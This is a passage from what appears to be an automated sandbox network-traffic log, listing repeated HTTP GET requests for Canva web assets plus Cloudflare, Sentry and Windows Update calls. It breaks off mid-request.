Source: global trafficHTTP traffic detected: GET /static/lib/sentry/7.16.0.min.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/4af0e43f4ef393f1.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/ad9231ed6706fadf.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Host: static.cloudflareinsights.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web/62d716053c361585.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/777de1c5173d2119.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/9e2d4720ffac5af4.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/93584becc156c1fd.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/c3c941edff432236.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/9e8a760576f2dccd.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/7aa7a229de4ac1cc.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /chunk-batch/9791fb4bf6628247.ltr.css+5eb15c719412ac66.ltr.css+a1dc22ba8402ef3d.ltr.css+a0684b0780c739e9.vendor.ltr.css+ddcf8590ae7c901d.ltr.css+ca9cfd0af880d084.ltr.css+14a7f0159a2b69de.ltr.css+202e686830bf1e42.ltr.css+d8958d2938e6e8fe.ltr.css+bc2b400c76016a88.ltr.css+7fc1a90e4d75fcc9.ltr.css HTTP/1.1Host: chunk-composing.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /api/1767683/envelope/?sentry_key=944d224d45b943ba9f96396432dfd868&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.16.0 HTTP/1.1Host: o13855.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Host: static.cloudflareinsights.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pO2K6stB2bhAWuO&MD=kHd4COxR HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /web/d34caaf7c270c576.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/40fff0481e1704cd.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/314d0852e94e7e23.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/de775bd2724d720f.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/319bbcd1cecdb6ee.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/f2ae43eac10a5a36.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/111dc8963cac940b.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/b3153e94a5482d0b.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/1790b19a3beefdca.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/f2b916a20536621e.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/3eff736f43ef8805.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/90a9bc138217d6b7.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/f5352d9ab53b693f.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/570ea329b63c4775.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/950e236801028122.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; 